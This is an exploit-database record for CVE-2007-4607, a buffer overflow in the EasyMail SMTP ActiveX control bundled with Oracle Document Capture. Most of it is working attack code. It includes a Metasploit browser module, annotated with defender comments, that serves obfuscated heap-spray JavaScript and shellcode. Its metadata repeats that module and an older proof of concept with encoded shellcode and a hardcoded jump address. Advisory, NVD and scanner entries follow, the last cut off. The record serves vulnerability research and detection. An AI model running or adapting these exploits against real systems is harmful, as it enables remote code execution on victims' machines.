ID PACKETSTORM:84575
Type packetstorm
Reporter MC
Modified 2009-12-31T00:00:00
Description
`###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
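# Metasploit browser-exploit module for CVE-2007-4607: a stack buffer
# overflow in the Quiksoft EasyMail SMTP ActiveX control (emsmtp.dll
# 6.0.1.0) as bundled with Oracle Document Capture 10g. The module runs an
# HTTP server; when a victim's Internet Explorer loads the served page the
# control is instantiated by ProgID and the overflow fires in the browser.
#
# Defender notes, grounded in the request handler below:
#   * Precondition: the control must be installed and scriptable from IE
#     (kill bit not set). Setting the kill bit for the control's CLSID, or
#     removing emsmtp.dll, neutralises the page entirely; the Nessus plugin
#     referenced on this page audits exactly that condition.
#   * Detection: identifiers AND string literals in the served script are
#     randomised by Rex ObfuscateJS ('Symbols' and 'Strings' options), so
#     static signatures on variable names or on the ProgID string are
#     unreliable. Endpoint-side signals (EasyMail control loaded into a
#     browser process, the large heap spray) are more robust; treat that
#     as a hypothesis to validate in your own environment.
#
# Code changes relative to the published version: the unused locals `p`
# and `fluff` are dropped and the nil check is written idiomatically; the
# served content is unchanged.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (name, references, payload constraints, the
  # single Windows/IE target) and the URIPATH option.
  #
  # @param info [Hash] metadata merged by update_info; normally empty.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',
      'Description' => %q{
        This module exploits a stack overflow in Oracle Document Capture 10g (10.1.3.5.0).
        Oracle Document Capture 10g comes bundled with a third party ActiveX control
        emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress"
        an attacker may be able to execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'MC' ],
      'Version' => '$Revision: 7724 $',
      'References' =>
        [
          [ 'CVE', '2007-4607' ],
          [ 'OSVDB', '38335' ],
          [ 'BID', '25467' ],
          [ 'US-CERT-VU', '281977' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      # 1024 bytes of payload space; NUL is the only bad char because the
      # payload travels as a JavaScript string.
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      # 'Ret' is never read by this module: control flow comes from the heap
      # spray in on_request_uri, not from a fixed return address.
      'Targets' =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
        ],
      'DisclosureDate' => 'Aug 28 2009',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
      ], self.class)
  end

  # Returns false so the framework's automatic browser-exploit selection
  # skips this module (presumably because it has no client fingerprinting;
  # confirm against the framework's autofilter docs).
  #
  # @return [false]
  def autofilter
    false
  end

  # Declares the module's runtime dependency on zlib via the HttpServer
  # mixin; what use_zlib enables beyond that is not visible here.
  def check_dependencies
    use_zlib
  end

  # HttpServer callback: builds and serves the exploit page for one client,
  # then hands the connection to the payload handler.
  #
  # @param cli [Rex::Socket] the connected client
  # @param request [Rex::Proto::Http::Request] the matched request; nothing
  #   in it is inspected here (only the URI path is matched by the mixin)
  # @return [nil]
  def on_request_uri(cli, request)
    # A fresh payload is generated per client; bail out when that fails.
    return if regenerate_payload(cli).nil?

    # JavaScript %uXXXX form of the encoded payload, in the target's byte order.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Page logic: instantiate the control by ProgID, spray the heap with the
    # payload up to 0x0a0a0a0a (sprayHeap is supplied by js_heap_spray),
    # then pass SubmitToExpress a 50,000-character string of 0x0a so the
    # overwritten pointer points into the sprayed region. Any script error
    # silently redirects the browser to about:blank.
    js = %Q|
      try {
        var evil_string = "";
        var index;
        var vulnerable = new ActiveXObject('EasyMail.SMTP.6');
        var my_unescape = unescape;
        var shellcode = '#{shellcode}';
        #{js_heap_spray}
        sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);
        for (index = 0; index < 12500; index++) {
          evil_string = evil_string + my_unescape('%0a%0a%0a%0a');
        }
        vulnerable.SubmitToExpress(evil_string);
      } catch( e ) { window.location = 'about:blank' ; }
    |

    # Obfuscation: rename the listed identifiers and rewrite string literals.
    opts = {
      'Strings' => true,
      'Symbols' => {
        'Variables' => [
          'vulnerable',
          'shellcode',
          'my_unescape',
          'index',
          'evil_string',
        ]
      }
    }
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
    # Merge the spray helper's own options, presumably so its symbols are
    # renamed consistently with the surrounding script.
    js.update_opts(js_heap_spray.opts)
    js.obfuscate

    content = %Q|
      <html>
      <body>
        <script><!--
        #{js}
        //</script>
      </body>
      </html>
    |

    print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end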
`
{"id": "PACKETSTORM:84575", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "description": "", "published": "2009-12-31T00:00:00", "modified": "2009-12-31T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://packetstormsecurity.com/files/84575/Oracle-Document-Capture-10g-ActiveX-Control-Buffer-Overflow.html", "reporter": "MC", "references": [], "cvelist": ["CVE-2007-4607"], "lastseen": "2016-12-05T22:24:59", "viewCount": 4, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2016-12-05T22:24:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4607"]}, {"type": "exploitdb", "idList": ["EDB-ID:16579", "EDB-ID:4328"]}, {"type": "osvdb", "idList": ["OSVDB:38335"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ORACLE_DC_SUBMITTOEXPRESS"]}, {"type": "nessus", "idList": ["EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13035", "SECURITYVULNS:DOC:29282"]}], "modified": "2016-12-05T22:24:59", "rev": 2}, "vulnersScore": 8.2}, "sourceHref": "https://packetstormsecurity.com/files/download/84575/oracle_dc_submittoexpress.rb.txt", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Oracle Document Capture 10g (10.1.3.5.0). 
\nOracle Document Capture 10g comes bundled with a third party ActiveX control \nemsmtp.dll (6.0.1.0). When passing a overly long string to the method \"SubmitToExpress\" \nan attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision: 7724 $', \n'References' => \n[ \n[ 'CVE', '2007-4607' ], \n[ 'OSVDB', '38335' ], \n[ 'BID', '25467' ], \n[ 'US-CERT-VU', '281977' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Aug 28 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]) \n], self.class) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# fluff.. \nfluff = rand_text_english(rand(20) + 1) \n \n# Encode the shellcode. 
\nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('EasyMail.SMTP.6'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000); \nfor (index = 0; index < 12500; index++) { \nevil_string = evil_string + my_unescape('%0a%0a%0a%0a'); \n} \nvulnerable.SubmitToExpress(evil_string); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n"}
{"cve": [{"lastseen": "2021-02-02T05:31:26", "description": "Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.", "edition": 4, "cvss3": {}, "published": "2007-08-31T00:17:00", "title": "CVE-2007-4607", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4607"], "modified": "2018-08-28T17:29:00", "cpe": ["cpe:/a:quicksoft:easymail_objects:*", "cpe:/a:gate_comm_software:postcast_server_pro:3.0.61"], "id": "CVE-2007-4607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4607", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gate_comm_software:postcast_server_pro:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:quicksoft:easymail_objects:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4607"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24199](https://secuniaresearch.flexerasoftware.com/advisories/24199/)\n[Secunia Advisory ID:26639](https://secuniaresearch.flexerasoftware.com/advisories/26639/)\nOther Advisory URL: http://milw0rm.com/exploits/4328\nOther Advisory URL: 
http://retrogod.altervista.org/postcast-emsmtp_bof.html\nISS X-Force ID: 36307\n[CVE-2007-4607](https://vulners.com/cve/CVE-2007-4607)\nCERT VU: 281977\nBugtraq ID: 25467\n", "edition": 1, "modified": "2007-08-28T00:00:00", "published": "2007-08-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38335", "id": "OSVDB:38335", "title": "PostCast Server EasyMailSMTPObj ActiveX (emsmtp.dll) SubmitToExpress Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:39:57", "description": "Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF. CVE-2007-4607. Remote exploit for windows platform", "published": "2007-08-28T00:00:00", "type": "exploitdb", "title": "Postcast Server Pro 3.0.61 / Quiksoft EasyMail emsmtp.dll 6.0.1 BoF", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2007-08-28T00:00:00", "id": "EDB-ID:4328", "href": "https://www.exploit-db.com/exploits/4328/", "sourceData": "<!-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object (emsmtp.dll 6.0.1)\n remote buffer overflow exploit\n (ie6 / xp sp2 version)\n\npassing more than 539 chars to SubmitToExpress method:\n\nEAX 00000400\nECX 0013DD24 ASCII \"Error Creating File: AAAA ...\nEDX C0403FFF\nEBX FFFFFFFF\nESP 0013D5E4\nEBP 0013DD08\nESI 41414141\nEDI 0013DD24 ASCII \"Error Creating File: AAAA ...\nEIP 06986256 emsmtp.06986256\n\n...\nCMP DWORD PTR DS:[ESI+180],1\nAccess violation when reading 414142C1\n\nseh overwrite follows:\n\nEAX 00000000\nECX 41414141\nEDX 7C9137D8 ntdll.7C9137D8\nEBX 00000000\nESP 0013D214\nEBP 0013D234\nESI 00000000\nEDI 00000000\nEIP 41414141\n\nand if we pass a readable address to ESI:\n\nA*539 + esi + A*99999\n\nwe fall in a more convenient\nsituation:\n\nEAX 00000000\nECX 0013DF7C ASCII \"AAAA...\nEDX 001835D0\nEBX 00000000\nESP 0013DF68 ASCII \"AAAA...\nEBP 41414141\nESI 05542A08\nEDI 05586250 
ASCII \"AAAA...\nEIP 41414141\n\nObject safety report:\nRegKey Safe for Script: true\nRegKey Safe for Init: true\n\nvendor urls: http://www.postcastserver.com/\n http://www.quicksoftcorp.com/\n\nrgod.\nsite: http://retrogod.altervista.org\n->\n\n\n<html>\n<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='EasyMailSMTPObj' /></object>\n<script language='vbscript'>\n\n 'open calc.exe\n scode = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _\n unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\") & _\n unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\") & _\n unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\") & _\n unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54\") & _\n unescape(\"%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37\") & _\n unescape(\"%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48\") & _\n unescape(\"%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38\") & _\n unescape(\"%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c\") & _\n unescape(\"%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e\") & _\n unescape(\"%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48\") & _\n unescape(\"%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54\") & _\n unescape(\"%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38\") & _\n unescape(\"%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43\") & _\n unescape(\"%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37\") & _\n unescape(\"%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a\") & _\n unescape(\"%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b\") & _\n unescape(\"%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33\") & _\n unescape(\"%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57\") & _\n unescape(\"%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49\") & _\n unescape(\"%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36\") & _\n unescape(\"%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a\")\n\n\nesi = unescape(\"%01%01%01%01\")\nebp = \"bbbb\"\nnop = 
string(16,unescape(\"%90\"))\neip = unescape(\"%78%2c%41%7e\") '0x7E412C78 jmp esp user32.dll\nbof = string(539,\"A\") + esi + ebp + eip + nop + scode\n\nEasyMailSMTPObj.SubmitToExpress bof\n\n</script>\n</html>\n\n# milw0rm.com [2007-08-28]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4328/"}, {"lastseen": "2016-02-02T00:10:56", "description": "Oracle Document Capture 10g ActiveX Control Buffer Overflow. CVE-2007-4607. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16579", "href": "https://www.exploit-db.com/exploits/16579/", "sourceData": "##\r\n# $Id: oracle_dc_submittoexpress.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\r\n\t\t\t\tOracle Document Capture 10g comes bundled with a third party ActiveX control\r\n\t\t\t\temsmtp.dll (6.0.1.0). 
When passing a overly long string to the method \"SubmitToExpress\"\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4607' ],\r\n\t\t\t\t\t[ 'OSVDB', '38335' ],\r\n\t\t\t\t\t[ 'BID', '25467' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '281977' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 28 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# fluff..\r\n\t\tfluff = rand_text_english(rand(20) + 1)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\t# CLSID:68AC0D5F-0424-11D5-822F-00C04F6BA8D9\r\n\t\t\t\tvar vulnerable = new ActiveXObject('EasyMail.SMTP.6');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 12500; index++) {\r\n\t\t\t\t\tevil_string = evil_string + 
my_unescape('%0a%0a%0a%0a');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.SubmitToExpress(evil_string);\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|\r\n\t\t\t<html>\r\n\t\t\t<body>\r\n\t\t\t\t<script><!--\r\n\t\t\t\t#{js}\r\n\t\t\t\t//</script>\r\n\t\t\t</body>\r\n\t\t\t</html>\r\n\t\t\t|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16579/"}], "metasploit": [{"lastseen": "2020-03-18T20:13:15", "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). 
When passing an overly long string to the method \"SubmitToExpress\" an attacker may be able to execute arbitrary code.\n", "published": "2009-11-15T01:01:21", "type": "metasploit", "title": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4607"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ORACLE_DC_SUBMITTOEXPRESS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). 
When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-4607' ],\n [ 'OSVDB', '38335' ],\n [ 'BID', '25467' ],\n [ 'US-CERT-VU', '281977' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Aug 28 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\n ])\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n // CLSID:68AC0D5F-0424-11D5-822F-00C04F6BA8D9\n var vulnerable = new ActiveXObject('EasyMail.SMTP.6');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 12500; index++) {\n evil_string = evil_string + my_unescape('%0a%0a%0a%0a');\n }\n vulnerable.SubmitToExpress(evil_string);\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = %Q|\n <html>\n <body>\n <script><!--\n #{js}\n //</script>\n </body>\n </html>\n |\n\n 
print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/oracle_dc_submittoexpress.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "Buffer overflows, unsafe method.", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:VULN:13035", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13035", "title": "Borland ActiveX security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "\r\n\r\nBorland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows\r\n\r\nActiveX settings:\r\nBinary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll\r\nVersion: 5.0.0.11\r\nProgID: EasyMail.SMTP.5\r\nCLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}\r\nSafe for Scripting: True\r\nSafe for Initialization: True\r\n\r\n\r\nSubmitToExpress and AddAttachment methods are vulnerable see CVE-2007-4607\r\nand CVE-2009-4663\r\n\r\n//rgod\r\n", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:DOC:29282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29282", "title": "Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T02:07:34", "description": "EasyMail Objects, a set of COM 
objects for supporting email \nprotocols, is installed on the remote Windows host. It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.", "edition": 25, "published": "2007-09-25T00:00:00", "title": "EasyMail SMTP Object ActiveX Control Multiple Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "modified": "2021-03-02T00:00:00", "cpe": [], "id": "EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/nessus/26185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26185);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2007-4607\", \"CVE-2009-4663\");\n script_bugtraq_id(25467, 36440);\n script_xref(name:\"CERT\", value:\"281977\");\n script_xref(name:\"EDB-ID\", value:\"4328\");\n script_xref(name:\"EDB-ID\", value:\"9705\");\n\n script_name(english:\"EasyMail SMTP Object ActiveX Control Multiple Buffer 